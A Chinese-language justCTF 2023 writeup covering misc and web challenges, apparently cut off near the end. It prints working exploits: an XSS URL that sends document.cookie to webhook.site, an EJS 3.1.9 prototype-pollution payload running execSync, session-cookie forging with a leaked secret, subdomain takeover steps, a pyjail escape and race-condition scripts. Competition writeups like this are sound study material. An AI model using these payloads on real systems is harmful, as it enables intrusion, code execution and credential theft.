justCTF 2023 WriteUps

這周在 TSJ 隊伍中解了些 web 和 misc 的題目。

Misc

ECC for Dummies

這題會隨機生成一些 boolean (cards),然後給你對那些 boolean 問一些問題 (以 cards[i] 組成的 python expression,用 AST 過濾),但有幾個問題的答案它會刻意給錯誤的結果,所以題目名稱的 ECC 應該是指 Error Correcting Code。

不過這題的 len(cards) == 5,直接送 0 0 0 0 0 當作答案其實就有 1/32 的機率是對的,直接硬爆即可。

1
2
while true; do echo '1\n1\n1\n1\n1\n1\n1\n1\n0 0 0 0 0\n' | nc eccfordummies.nc.jctf.pro 1337 | grep flag; done
# justCTF{S0me7ime$_L0Gic_1s_n0T_B1n4ry_0101}

不過後來發現它 AST 過濾的部分根本沒寫好,最簡單可以直接 breakpoint() 就過了 XD。

ECC not only for Dummies

這題上了 PoW 並修改了一些題目,但 AST 過濾的部分還是沒寫好,所以也是 breakpoint() 就過了 XD。

1
2
3
breakpoint()
open('flag.txt').read()
# justCTF{S4nd_S0metim3s_It$_EvEn_$0lv4ble}

想要正經版的 Error Correcting Code 題目建議參考 WMCTF 的 nanoDiamond(-rev)

PyPlugins

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
#!/usr/bin/env python3.10
import dis
import os
import sys
import re
import runpy
import py_compile

import requests


PLUGINS_PATH = "/plugins/"
TRUSTED_DOMAINS = [
'blackhat.day',
'veganrecipes.soy',
'fizzbuzz.foo',
]

def banner():
print("1. List known websites")
print("2. List plugins")
print("3. Download plugin")
print("4. Load plugin")
print("5. Exit")

def list_known_websites():
print("great.veganrecipes.soy")
print("uplink.blackhat.day")
print("plugandplay.fizzbuzz.foo")

def list_plugins():
print("Plugins:")
for f in os.listdir(PLUGINS_PATH):
print(f" {f}")


PATH_RE = re.compile(r"^[A-Za-z0-9_]+$")
MAX_SIZE = 4096

def _get_file(url):
with requests.get(url, stream=True) as r:
r.raise_for_status()
chunks = 0
for chunk in r.iter_content(chunk_size=4096):
return chunk
raise Exception("")


def download_plugin():
print("Provide plugin url in a form of A.B.C where A,B,C must be [A-Za-z0-9_]+")
url = input("url: ").strip()
try:
a, b, c = url.split(".")
if not all(PATH_RE.match(x) for x in (a, b, c)):
print("FAIL:",a,b,c)
raise Exception()
except:
print("ERR: Invalid url format. Cannot download plugin.")
return

domain = f"{b}.{c}"
if domain not in TRUSTED_DOMAINS:
print("ERR: Domain not trusted. Aborting.")
return

url = f"https://{a}.{b}.{c}/"
try:
code = _get_file(url).decode()
# Validate plugin code
cobj = test_expr(code, ALLOWED_OPCODES)
# Constants must be strings!
assert all(type(c) in (str, bytes, type(None)) for c in cobj.co_consts)
except Exception as e:
print(f"ERR: Couldnt get plugin or plugin is invalid. Aborting.")
return

# TODO/FIXME: So far our plugins will just print global strings
# We should make it more powerful in the future, but at least it is secure for now
code += '\nx = [i for i in globals().items() if i[0][0]!="_"]\nfor k, v in x: print(f"{k} = {v}")'

with open(f"{PLUGINS_PATH}/{a}_{b}.py", "w") as f:
f.write(code)

### Code copied from Pwntools safeeval lib
# see https://github.com/Gallopsled/pwntools/blob/c72886a9b9/pwnlib/util/safeeval.py#L26-L67
# we did a small modification: we pass 'exec' instead of 'eval' to `compile`
def _get_opcodes(codeobj):
if hasattr(dis, 'get_instructions'):
return [ins.opcode for ins in dis.get_instructions(codeobj)]
i = 0
opcodes = []
s = codeobj.co_code
while i < len(s):
code = six.indexbytes(s, i)
opcodes.append(code)
if code >= dis.HAVE_ARGUMENT:
i += 3
else:
i += 1
return opcodes

def test_expr(expr, allowed_codes):
allowed_codes = [dis.opmap[c] for c in allowed_codes if c in dis.opmap]
try:
c = compile(expr, "", "exec")
except SyntaxError as ex:
print(ex)
raise ValueError("%r is not a valid expression" % expr)
codes = _get_opcodes(c)
for code in codes:
if code not in allowed_codes:
raise ValueError("opcode %s not allowed" % dis.opname[code])
return c


ALLOWED_OPCODES = ["LOAD_CONST", "STORE_NAME", "RETURN_VALUE"]

def load_plugin():
"""
Loads the plugin performing various sanity checks.
A plugin must only define strings in it.
"""
plugin = input("plugin: ").strip()
if not PATH_RE.match(plugin):
print("Invalid plugin name. Aborting.")
return

plugin_path = f"{PLUGINS_PATH}/{plugin}.py"

if not os.path.exists(plugin_path):
print("Path not found: %s" % plugin_path)
return

# We validated the plugin when we downloaded it
# so it must be secure to run it now: it should just print globals.
runpy.run_path(py_compile.compile(plugin_path))

funcs = {
1: list_known_websites,
2: list_plugins,
3: download_plugin,
4: load_plugin,
5: sys.exit
}

def main():
print("Welcome to the PyPlugins challenge!")
print("We will load your Python plugins, but only if they are hosted on a trusted website and if they cannot harm us.")

while True:
banner()
n = input('> ')
try:
n = int(n)
func = funcs[n]
except:
print("Wrong input. Try again")
continue
try:
func()
except Exception as e:
print(f"Faild")
raise

if __name__ == '__main__':
main()

簡單來說這題可以從指定 domain 下載 plugin 並且執行,但是只能執行 LOAD_CONST, STORE_NAME, RETURN_VALUE 這三個 opcode,所以類似 pyjail。

首先是要找方法繞 domain 限制,dig 一下那幾個 domain 的 subdomain 會發現它基本上是直接 wildcard CNAME 到 GitHub Pages。

  • *.blackhat.day -> whateverherebecausewhocares.github.io
  • *.veganrecipes.soy -> dc3dtest.github.io
  • *.fizzbuzz.foo -> howdoesthiswork.github.io

所以有機會做 subdomain takeover。

具體方法也很簡單,例如假設我的目標是拿下 maple.blackhat.day,那就在自己帳號底下建一個 repo 叫 whateverherebecausewhocares.github.io,然後放一個 CNAME 檔案內容為 maple.blackhat.day,之後進 repo settings 的 pages 等一下就能 takeover 了。

剩下是 pyjail 的部分,我這邊是注意到它 compile(expr, "", "exec")exprstr,而寫入檔案後再執行時其實是當 bytes 處理的,而 Python 在遇到 bytes 類型的 source code 時是會接受 #coding: ... 這種 comment 的,所以我用這個就繞過了:

1
2
#coding: raw_unicode_escape
x='PEKO\u0027\u002b\u0062\u0072\u0065\u0061\u006b\u0070\u006f\u0069\u006e\u0074\u0028\u0029\u002b\u0027'

不過 flag 是 justCTF{GitHub_P4g3s_Subd0ma1ns_And_Z1pp3d_Pycs_Ar3_Cr4zy!},所以顯然不是 intended XD。

這題 intended 是個 CPython 0day (?): py/pyc/zip file type confusion

總之就是 python 是能接受 zip file 當作 input 的 (參考 zipapp),裡面的運作原理和一般 zip 解壓縮很像,就是找 zip 的 end of central directory 之類的。另一方面 CPython 還有個 pyc 檔案包含了一些 header 和 code object,而 code object 上又會有 co_consts 的存在。

所以如果你有個 Python 裡面有個很長的 byte literal 包含了一個 zip,它編譯成 pyc 之後會直接在裡面展開,而此時去執行它的時候 CPython 反而是會因為那個 zip signature 而把它誤認成 zip 來執行。其他的說明可以參考這個

Python Zip confusion: POC

Web

eXtra Safe Security layers

這題核心部分是這段 code:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
app.use((req, res, next) => {
if (req.query) {
// Saferty layer 2
const s = JSON.stringify(req.query).toLowerCase();
for (const b of blacklist) {
if (s.includes(b.toLowerCase())) {
return res.status(403).send("You are not allowed to do that.");
}
}

// Safety layer 3
for (const c of s) {
if (c.charCodeAt(0) > 127 || c.charCodeAt(0) < 32) {
return res.status(403).send("You are not allowed to do that.");
}
}
}

if (req.cookies?.admin === adminCookie) {
res.user = {
isAdmin: true,
text: "Welcome back :)",
unmodifiable: {
background: "admin_background.png",
CSP: `default-src 'self'; img-src 'self'; style-src '${css}'; script-src '${adminJs}' '${commonJs}';`,
},
};
} else {
// Safety layer 4
res.user = {
text: "Hi! You can modify this text by visiting `?text=Hi`. But I must warn you... you can't have html tags in your text.",
unmodifiable: {
background: "background.png",
},
};
}

if (req.query.text) {
res.user = { ...res.user, ...req.query };
}

// Safety layer 5
res.set("Content-Security-Policy", res.user.unmodifiable.CSP ?? defaultCSP);
next();
});

還有 ejs template 部分有這個:

1
2
3
4
5
6
7
<script>
// load background...
main.innerHTML += `
<img class='background' src='<%- unmodifiable?.background %>'>
`;
console.log('Loaded!');
</script>

blacklist 部分就一些常見的 js function 如 alert eval 之類的,很好繞,之後最主要的關鍵是 res.user = { ...res.user, ...req.query },這邊可以用 query string 造 object 去蓋過 unmodifiable 的部分,這樣就能改 CSPbackground,而 background 直接 code injection 即可。

1
http://xssl.web.jctf.pro/?text=a&unmodifiable[CSP]=a&unmodifiable[background]=`;location.assign(%27https://webhook.site/XXXXX?%27%2Bdocument.cookie);`

Dangerous

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
require "sinatra"
require "sqlite3"
require "erubi"
require "digest"
require "json"

config = JSON.parse(File.read("./config.json"))

set :bind, '0.0.0.0'
enable :sessions
set :erb, :escape_html => true

con = SQLite3::Database.new "sqlite.db"

con.execute "CREATE TABLE IF NOT EXISTS threads(
id INTEGER PRIMARY KEY AUTOINCREMENT,
content TEXT,
ip TEXT,
username TEXT
);"

con.execute "CREATE TABLE IF NOT EXISTS replies(
id INTEGER PRIMARY KEY AUTOINCREMENT,
content TEXT,
ip TEXT,
username TEXT,
thread_id INTEGER
);"

def get_threads(con)
return con.execute("SELECT * FROM threads ORDER BY id DESC;")
end

def get_replies(con, id)
return con.execute("SELECT *, null, 0 as p FROM threads WHERE id=?
UNION SELECT *, 1 as p FROM replies WHERE thread_id=? order by p", [id, id])
end

def is_allowed_ip(username, ip, config)
return config["mods"].any? {
|mod| mod["username"] == username and mod["allowed_ip"] == ip
}
end


get "/" do
@threads = get_threads(con)
erb :index
end

post "/thread" do
if params[:content].nil? or params[:content] == "" then
raise "Thread content cannot be empty!"
end
if session[:username] then
username = is_allowed_ip(session[:username], request.ip, config) ? session[:username] : nil
end
# === temporarily disabled ===
# con.execute("INSERT INTO threads (id, content, ip, username)
# VALUES (?, ?, ?, ?)", [nil, params[:content], request.ip, username])
redirect to("/#{con.execute('SELECT last_insert_rowid()')[0][0]}")
end

get "/flag" do
if !session[:username] then
erb :login
elsif !is_allowed_ip(session[:username], request.ip, config) then
return [403, "You are connecting from untrusted IP!"]
else
return config["flag"]
end
end

post "/login" do
if config["mods"].any? {
|mod| mod["username"] == params[:username] and mod["password"] == params[:password]
} then
session[:username] = params[:username]
redirect to("/flag")
else
return [403, "Incorrect credentials"]
end
end

get "/:id" do
@id = params[:id]
@replies = get_replies(con, @id)
erb :thread
end

post "/:id" do
if params[:content].nil? or params[:content] == "" then
raise "Reply content cannot be empty!"
end
if session[:username] then
username = is_allowed_ip(session[:username], request.ip, config) ? session[:username] : nil
end
@id = params[:id]
# === temporarily disabled ===
# con.execute("INSERT INTO replies (id, content, ip, username, thread_id)
# VALUES (?, ?, ?, ?, ?)", [nil, params[:content], request.ip, username, @id])
redirect to("/#{@id}")
end

ruby 題,跑的時候是直接 ruby dangerous.rb 執行的。直接用空 content POST /thread 會有 error page,可發現它是跑在 debug mode 下的,所以能在頁面上找到 session secret。

有 session secret 就代表能隨意修改 cookie,而它底層是用 ruby Marshal.load 去反序列化的。不過在這個 Ruby 3.2 版本中我用 Google 查到的 payload 都沒有成功,所以就只有拿它來修改 session[:username] 而已。

從它給的網站上可知 admin 的 username 是 janitor,另外還有兩個 thread 都有 admin 的留言,而 thread.erb 裡面有:

1
2
3
4
5
6
7
8
9
10
11
12
<% @replies.each do |reply| %>
<div style="padding-bottom: 1rem">
<% user_color = Digest::SHA256.hexdigest(reply[2] + @id).slice(0, 6) %>
<div style="color: #<%= user_color %>;">
<%= user_color %>
<% if reply[3] %>
<span style="color: #ff0000;">##Admin:<%= reply[3] %>##</span>
<% end %>
</div>
<div><%= reply[1] %></div>
</div>
<% end %>

所以可以知道 sha256(admin_ip + '1')[:6]sha256(admin_ip + '2')[:6],而 ipv4 空間不大所以可以直接爆:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
from hashlib import sha256
from concurrent.futures import ProcessPoolExecutor


def task(a):
print(f"{a} started")
for b in range(256):
for c in range(256):
for d in range(256):
ip = f"{a}.{b}.{c}.{d}"
h1 = sha256((ip + "1").encode()).hexdigest()[:6]
h2 = sha256((ip + "2").encode()).hexdigest()[:6]
if h1 == "32cae2" and h2 == "92e1e8":
print(ip)


with ProcessPoolExecutor(max_workers=8) as executor:
for a in range(256):
executor.submit(task, a)

最後得到的 ip 是 10.24.170.69,所以改 session 然後用 X-Forwarded-For 偽造 ip 就能拿到 flag 了。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
import hashlib, hmac, base64
from urllib.parse import quote, unquote
from Crypto.Cipher import AES
from subprocess import check_output
import requests
import os

sess = unquote(requests.get("http://dangerous.web.jctf.pro/flag").cookies["rack.session"])

print(sess)
secret = "a9316e61bc75029d52f915823d7bb628a4adae8b174bce89fd38ec4c7fb925a07e2ccbc01572b9fdce56502ef5d02609e5194a5ddd649ff349a206002e96a99d"
key = bytes.fromhex(secret)[:32]


ct, iv, auth = map(base64.b64decode, sess.split("--"))
cipher = AES.new(key, AES.MODE_GCM, nonce=iv)
hh = cipher.decrypt_and_verify(ct, auth).hex()
out = check_output(
["ruby"],
input=f"""
hex_data = "{hh}"
data = [hex_data].pack("H*")
r = Marshal.load(data)
puts r
r["username"] = "janitor"
puts r
puts Marshal.dump(r).unpack("H*")[0]
""".encode(),
).decode()
print(out)

pt = bytes.fromhex(out.split("\n")[-2])
iv = os.urandom(len(iv))
cipher = AES.new(key, AES.MODE_GCM, nonce=iv)
ct, auth = cipher.encrypt_and_digest(pt)
sess = b"--".join(map(base64.b64encode, [ct, iv, auth])).decode()
print(sess)
r = requests.get(
"http://dangerous.web.jctf.pro/flag",
cookies={"rack.session": quote(sess)},
headers={"X-Forwarded-For": "10.24.170.69"},
)
print(r.text)
# justCTF{1_th1nk_4l1ce_R4bb1t_m1ght_4_4_d0g}

Perfect Product

這題用 ejs 3.1.9,而核心部分 code 是:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
app.all('/product', (req, res) => {
const params = req.query || {};
Object.assign(params, req.body || {});

let name = params.name
let strings = params.v;


if(!(strings instanceof Array) && !Array.isArray(strings)){
strings = ['NaN', 'NaN', 'NaN', 'NaN', 'NaN'];
}

// make _0 to point to all strings, copy to prevent reference.
strings.unshift(Array.from(strings));

const data = {};

for(const idx in strings){
data[`_${idx}`] = strings[idx];
}

if(typeof name !== 'string'){
name = `Product: NaN`;
}else{
name = `Product: ${name}`;
}

data['productname'] = name;

data['print'] = !!params.print;


res.render('product', data);
});

顯然這題的目標是要透過 data 去修改 ejs 的設定,然後弄 code injection 拿 RCE。

參考這個可知我們需要能讓 data.settings 有東西才行,不過單看 code 會覺得是不可能的。不過把 js 的 prorotype 機制加進來考慮的話會發現其實能汙染到 data.__proto__.settings 也是可以的,所以找辦法讓 strings 不是 array 才行。

要繞過那個 assignment 的一個簡單方法是讓 strings instanceof Arraytrue,而 js 中 { __proto__: [] } instanceof Array 是成立的,所以用 ?v[__proto__][0]&v[_proto__][x]=0 就能讓 data.__proto__.x === '0' 了。

接下來我嘗試使用這個的 payload,但發現它 code injection 很麻煩,需要讓 options 的 payload 和 ejs 的部分內容一致才能做到。不過此時我突然想起不久前打 FCSC 2023 時也有一題類似的題目也是一樣要透過 ejs settings 去 RCE 的,當時我就有找到這個 gadget:

1
2
3
4
5
6
7
8
9
const payload = {
settings: {
'view options': {
debug: true,
client: true,
escapeFunction: '(() => {});return process.mainModule.require("child_process").execSync("cat /app/flag*").toString()'
}
}
}

其他人的 writeup (法文): FCSC 2023 : Peculiar Caterpillar

而且當時的版本也是 ejs 3.1.9,所以直接拿來用就行了:

1
2
curl -H 'Content-Type: application/json' -g 'http://sy0rdzpzb0mexasqml3bzv9tqtgqo3.perfectproduct.web.jctf.pro/product?v[__proto__][0]&v[2]=1&v[3]=1&v[4]=1' -G --data-urlencode 'v[_proto__][settings][view%20options][debug]=true' --data-urlencode 'v[_proto__][settings][view%20options][client]=true' --data-urlencode 'v[_proto__][settings][view%20options][escapeFunction]=(() => {});return process.mainModule.require("child_process").execSync("/readflag").toString()' --data-urlencode 'v[_proto__][cache]='
# justCTF{found_the_bug_myself_but_i_guess_people_like_to_report_0days_publicly}

還有這種 bug (?) 其實現在 ejs 已經說這不算是 bug 了: Out-of-Scope Vulnerabilities,所以不用修的樣子。

Aquatic Delights

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
#!/usr/bin/env python
import flask
import json
import sqlite3
from os import getenv

app = flask.Flask(__name__, static_url_path='/static')
DATABASE = None

def database_connection(func):
def wrapper(self, *args, **kwargs):
with sqlite3.connect('/tmp/shop.db') as con:
if hasattr(self, 'locked') and self.locked:
return flask.jsonify({'result': 'NG', 'reason': 'Database is locked!'}), 500
try:
return func(self, con.cursor(), *args, **kwargs)
except Database.Error as ex:
return flask.jsonify({'result': 'NG', 'reason': str(ex)}), 500
except:
return flask.abort(500, 'Something went wrong')

return wrapper

def database_lock(func):
def wrapper(self, *args, **kwargs):
try:
self.locked = True
result = func(self, *args, **kwargs)
except:
raise
finally:
self.locked = False

return result
return wrapper

class Database(object):
@database_connection
def __init__(self, cur):
self.just_coins = 10

cur.execute("DROP TABLE IF EXISTS shop")
cur.execute("CREATE TABLE shop(name, price, available)")
shop_data = [
('Catfish', 1, 10),
('Rainbow Guppy', 5, 5),
('Koi Carp', 20, 3),
('Royal Angelfish', 100, 1),
('Flagfish', 1337, 1)
]
cur.executemany("INSERT INTO shop(name, price, available) VALUES(?, ?, ?)", shop_data)

cur.execute("DROP TABLE IF EXISTS inventory")
cur.execute("CREATE TABLE inventory(name, available)")
cur.executemany("INSERT INTO inventory(name, available) VALUES(?, ?)",
[
(name, 0) for name, _, _ in shop_data
]
)

def _get_shop(self, cur, name=None):
if name is None:
return {x[0]: x[1:] for x in cur.execute("SELECT * FROM shop")}
else:
cur.execute("SELECT price, available FROM shop WHERE name = ?", (name,))
return cur.fetchone()

def _get_inventory(self, cur, name=None):
if name is None:
return {x[0]: x[1] for x in cur.execute("SELECT * FROM inventory")}
else:
cur.execute("SELECT available FROM inventory WHERE name = ?", (name,))
return cur.fetchone()[0]

def _update_shop(self, cur, name, available):
cur.execute("UPDATE shop SET available = ? WHERE name = ?", (available, name))

def _update_inventory(self, cur, name, available):
cur.execute("UPDATE inventory SET available = ? WHERE name = ?", (available, name))

def _get_shop_data(self, cur):
data = {}
shop = self._get_shop(cur)
inventory = self._get_inventory(cur)
for name, item in shop.items():
data[name.replace(' ', '_')] = {
'price': item[0],
'available': item[1],
'eat': inventory.get(name)
}

return data

class Error(Exception):
pass

@database_connection
@database_lock
def buy(self, cur, name, amount):
shop_price, shop_available = self._get_shop(cur, name)
inv_available = self._get_inventory(cur, name)

if shop_available == 0: raise Database.Error('There is no more item of this type in shop')
if amount <= 0 or amount > 0xffffffff: raise Database.Error('Invalid amount')
if shop_available < amount: raise Database.Error('Not enough items in shop')

total_price = shop_price * amount
if total_price > self.just_coins: raise Database.Error('Not enough justCoins')

self.just_coins -= total_price
self._update_inventory(cur, name, inv_available + amount)
self._update_shop(cur, name, shop_available - amount)

return flask.jsonify({'result': 'OK', 'response': f'Successfully bought {amount} {name}',
'justCoins': DATABASE.just_coins, 'data': self._get_shop_data(cur)})

@database_connection
@database_lock
def sell(self, cur, name, amount):
inv_available = self._get_inventory(cur, name)

if inv_available < amount: raise Database.Error('Not enough items in inventory')
if amount <= 0 or amount > 0xffffffff: raise Database.Error('Invalid amount')

shop_price, shop_available = self._get_shop(cur, name)
total_price = shop_price * amount

self.just_coins += total_price
self._update_inventory(cur, name, inv_available - amount)
self._update_shop(cur, name, shop_available + amount)

return flask.jsonify({'result': 'OK', 'response': f'Successfully sold {amount} {name}',
'justCoins': DATABASE.just_coins, 'data': self._get_shop_data(cur)})

@database_connection
def eat(self, cur, name):
inv_available = self._get_inventory(cur, name)

if inv_available <= 0: raise Database.Error('Not enough items in inventory')
self._update_inventory(cur, name, inv_available - 1)

if name == 'Flagfish':
response = getenv("FLAG")
else:
response = 'Nothing happened'

return flask.jsonify({'result': 'OK', 'response': response, 'justCoins': DATABASE.just_coins,
'data': self._get_shop_data(cur)})

@database_connection
def get_table(self, cur):
return flask.render_template('table.html', inv=DATABASE._get_inventory(cur), shop=DATABASE._get_shop(cur))

@database_connection
def get_inventory(self, cur=None):
return self._get_inventory(cur)

@database_connection
def get_shop(self, cur=None):
return self._get_shop(cur)

@app.route('/', methods=['GET'])
def index():
return flask.render_template('index.html', just_coins=DATABASE.just_coins, inv=DATABASE.get_inventory(), shop=DATABASE.get_shop())

@app.route('/api/buy', methods=['POST'])
def api_buy():
try:
data = json.loads(flask.request.data)
assert isinstance(data['name'], str)
assert isinstance(data['amount'], int)
except:
return flask.abort(400, 'Invalid request')

return DATABASE.buy(data['name'], data['amount'])

@app.route('/api/sell', methods=['POST'])
def api_sell():
try:
data = json.loads(flask.request.data)
assert isinstance(data['name'], str)
assert isinstance(data['amount'], int)
except:
return flask.abort(400, 'Invalid request')

return DATABASE.sell(data['name'], data['amount'])

@app.route('/api/eat', methods=['POST'])
def api_eat():
try:
data = json.loads(flask.request.data)
assert isinstance(data['name'], str)
except:
return flask.abort(400, 'Invalid request')

return DATABASE.eat(data['name'])

@app.route('/reset', methods=['GET'])
def reset():
DATABASE.__init__()

return flask.redirect("/")

if __name__ == '__main__':
DATABASE = Database()
app.run(host="0.0.0.0", port=8080)

很標準的 shop app,不過 buy sell 都有上 database lock,所以理論上不應該有 race condition。

不過我把 database_connection 稍微修改一下紀錄當前 entry 的次數方法它其實沒有很好的 lock 住 database:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
def database_connection(func):
def wrapper(self, *args, **kwargs):
if getattr(self, 'entry', None) is None:
self.entry = 0
with sqlite3.connect('/tmp/shop.db') as con:
if hasattr(self, 'locked') and self.locked:
return flask.jsonify({'result': 'NG', 'reason': 'Database is locked!'}), 500
try:
self.entry += 1
import sys
print(self.entry, file=sys.stderr)
return func(self, con.cursor(), *args, **kwargs)
except Database.Error as ex:
return flask.jsonify({'result': 'NG', 'reason': str(ex)}), 500
except:
return flask.abort(500, 'Something went wrong')
finally:
self.entry -= 1

return wrapper

因為其實有可能有多個 request 同時都在 database_connectiondatabase_lock 中間過渡的過程,所以直接硬 spam 還是有機會 race 成功的,只是比沒 lock 的版本比起來機率比較低而已。

所以就寫個腳本硬 race,而 sell 的次數應該要比 buy 多這樣錢就會增加:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
import requests
from threading import Thread

# host = "http://localhost:8080"
host = "http://lcy5kjz4es4502p3acpac6czn5t4gs.aquatic-sgp1.web.jctf.pro"


def buy(name, amount):
try:
return requests.post(
host + "/api/buy", json={"name": name, "amount": amount}
).json()
except:
pass


def sell(name, amount):
try:
return requests.post(
host + "/api/sell", json={"name": name, "amount": amount}
).json()
except:
pass


def eat(name):
try:
return requests.post(host + "/api/eat", json={"name": name}).json()
except:
pass


def reset():
requests.get(host + "/reset", allow_redirects=False).text


def main():
# tune this according to current total coins
# cur = ("Catfish", 10)
# cur = ("Rainbow Guppy", 3)
# cur = ("Koi Carp", 8)
cur = ("Royal Angelfish", 4)

def bb():
r = buy(*cur)
if r is not None and "justCoins" in r:
tot = r["justCoins"]
for name, d in r["data"].items():
tot += d["price"] * d["eat"]
print("b", r["justCoins"], tot)

def ss():
r = sell(*cur)
if r is not None and "justCoins" in r:
tot = r["justCoins"]
for name, d in r["data"].items():
tot += d["price"] * d["eat"]
print("s", r["justCoins"], tot)

while True:
Thread(target=bb).start()
Thread(target=ss).start()
Thread(target=ss).start()
Thread(target=ss).start()


main()
# justCTF{r4c3_w1nn3r_w1nn3r_ch1ck3n_d1nn3r!}

Phantom

這題有很簡單的帳號註冊系統,然後登入後可以修改自己的 name 和 description,而 flag 在 admin bot 的 name 中。

其中 description 會經過這個過濾:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
func isSafeHTML(input string) bool {
var buffer bytes.Buffer
tokenizer := html.NewTokenizer(strings.NewReader(input))

for {
tt := tokenizer.Next()
switch {
case tt == html.ErrorToken:
return true
case tt == html.StartTagToken, tt == html.EndTagToken, tt == html.SelfClosingTagToken:
token := tokenizer.Token()
if len(token.Attr) > 0 {
return false
}

switch token.Data {
case "h1", "h2", "h3", "h4", "h5", "h6", "b", "i", "a", "img", "p", "code", "svg", "textarea":
buffer.WriteString(token.String())
default:
return false
}
case tt == html.TextToken:
buffer.WriteString(tokenizer.Token().String())
default:
return false
}
}
}

看到 <svg> 就讓我想到能到因為 <svg> 裡面的 parsing 模式是類似 xml 的,而 <textarea> 內部的內容是不用經過 escape 的 (RCDATA state)。所以 <svg><textarea></svg><script>... 理論上應該是能過的,測試一下也真的可以。

我之所以知道這個是因為不久前我也在 Joplin 中找到了一個很類似的 XSS

剩下就是要怎麼透過繞過 CSRF 去 login 或是修改 profile 了,直接看 code 會發現 profileEdit (/profile/edit) 有點特別:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
func profileEditHandler(w http.ResponseWriter, r *http.Request) {
if r.Method == http.MethodGet {
session, _ := store.Get(r, "session")
if auth, ok := session.Values["authenticated"].(bool); !ok || !auth {
http.Error(w, "Forbidden", http.StatusForbidden)
return
}
username := session.Values["username"].(string)
if user, ok := Users[username]; ok {
data := map[string]interface{}{
"User": user,
"csrfToken": csrf.Token(r),
}
templates.ExecuteTemplate(w, "edit", data)
} else {
http.Error(w, "Unauthenticated", http.StatusUnauthorized)
return
}
} else {
// handle file upload
session, _ := store.Get(r, "session")
if auth, ok := session.Values["authenticated"].(bool); !ok || !auth {
http.Error(w, "Forbidden", http.StatusForbidden)
return
}
name := r.FormValue("name")
description := r.FormValue("description")

username := session.Values["username"].(string)
if user, ok := Users[username]; ok {

if isSafeHTML(description) {
descriptionHTML, err := html.Parse(strings.NewReader(description))
var buf bytes.Buffer
html.Render(&buf, descriptionHTML)

if err != nil {
http.Error(w, "Forbidden", http.StatusForbidden)
}
if len(name) > 0 {
user.Name = name
}
user.Description = buf.String()

data := map[string]interface{}{
"Name": user.Name,
"Description": template.HTML(user.Description),
}
templates.ExecuteTemplate(w, "profile", data)
} else {
http.Error(w, "Forbidden", http.StatusForbidden)
return
}
}
}
}

最主要的不同點在於它判斷 method 的地方用了 else,和其他幾個 handler 中的做法不同: } else if r.Method == http.MethodPost {。直接參考 csrf.go 也能知道 GET, HEAD, OPTIONS, TRACE 這幾個 method 都不會被檢查 csrf token,所以可以透過這幾個 method 並同時送 body 就能成功修改,用 curl 也確定能成功。

然而我找不到方法用 fetch 或是 form 在送 GET HEAD request 也能帶 body 的方法,所以就放棄了這條路。

我是改用了 http://xssl.web.jctf.pro 這個 domain 和 https://phantom.web.jctf.pro 屬於 same site 的關係,所以我可從 xssl.web.jctf.pro 改 cookie。

不過 document.cookie = 'session=... ;path=/profile; domain=web.jctf.pro' 因為某些未知原因起不了作用,我猜大概是因為原本的 cookie 是 Secure 或是 HttpOnly 的所以它不給你改。不過幸好我不久前有看到 Cookie Bugs - Smuggling & Injection 這篇文章,從裡面學到了 document.cookie = '=a=b' 在瀏覽器中是個 (key, value) = ('', 'a=b') 的 cookie,而它被 serialize 到 Cookie header 時會變成 Cookie: a=b (注意 key 和 value 中間的等號不見了)。這個在 Go 的 cookie parsing algorithm 眼中會是一個 (key, value) = ('a', 'b') 的 cookie,所以透過這個方法就能成功改 session cookie 了。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
<script>
const samesiteXSS =
